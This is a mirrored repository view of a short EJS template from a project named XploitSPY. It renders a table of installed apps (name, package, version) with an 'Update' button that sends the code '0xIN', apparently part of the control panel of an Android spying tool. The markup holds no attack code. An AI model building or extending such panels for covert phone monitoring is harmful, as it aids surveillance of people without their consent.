mirror of
https://github.com/XploitWizer-Community/XploitSPY.git
synced 2024-11-05 18:09:22 +08:00
26 lines
902 B
Plaintext
26 lines
902 B
Plaintext
|
<div class="ui segment">
|
||
|
<div class="ui secondary menu">
|
||
|
<div class="right menu">
|
||
|
<button onclick="updateButton(this, '0xIN')" class="ui blue button"> <i
|
||
|
class="icon sync"></i>Update</button>
|
||
|
</div>
|
||
|
</div>
|
||
|
<table class="ui celled table">
|
||
|
<thead>
|
||
|
<tr>
|
||
|
<th>Name</th>
|
||
|
<th>Package</th>
|
||
|
<th>Version</th>
|
||
|
</tr>
|
||
|
</thead>
|
||
|
<tbody>
|
||
|
<% pageData.forEach((app) => { %>
|
||
|
<tr>
|
||
|
<td title="<%= app.appName %>"><%= app.appName.substring(0,24) %></td>
|
||
|
<td title="<%= app.packageName %>"><%= app.packageName %></td>
|
||
|
<td title="<%= app.versionName %>"><%= app.versionName.substring(0,12) %></td>
|
||
|
</tr>
|
||
|
<% }) %>
|
||
|
</tbody>
|
||
|
</table>
|
||
|
</div>
|